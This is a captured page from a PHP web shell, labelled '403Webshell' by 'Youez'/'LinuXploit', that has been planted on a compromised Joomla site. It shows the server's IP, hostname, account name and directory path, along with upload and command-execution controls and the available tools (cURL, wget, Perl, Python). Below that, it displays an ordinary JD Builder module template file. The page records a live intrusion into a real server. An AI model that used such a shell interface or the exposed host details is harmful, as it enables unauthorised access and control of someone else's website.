403Webshell
Server IP : 213.186.33.3  /  Your IP : 216.73.216.139
Web Server : Apache
System : Linux webm009.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : vinspier ( 47490)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/vinspier/www/modules/mod_jdbuilder/tmpl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/vinspier/www/modules/mod_jdbuilder/tmpl/default.php
<?php

/**
 * @package    JD Builder
 * @author     Team Joomdev <info@joomdev.com>
 * @copyright  2020 www.joomdev.com
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

// no direct access
defined('_JEXEC') or die;
$layout_id = $params->get('jdbuilder_layout', 0);
if (!empty($layout_id)) {
    $layout = \JDPageBuilder\Helper::getLayout($layout_id);
    $layout = new \JDPageBuilder\Element\Layout($layout, 'module', $module->id);
    $rendered = $layout->render();
    \JDPageBuilder\Builder::renderHead();
    echo $rendered;
    JDPageBuilder\Builder::onBeforeBodyClose();
}

Youez - 2016 - github.com/yon3zu
LinuXploit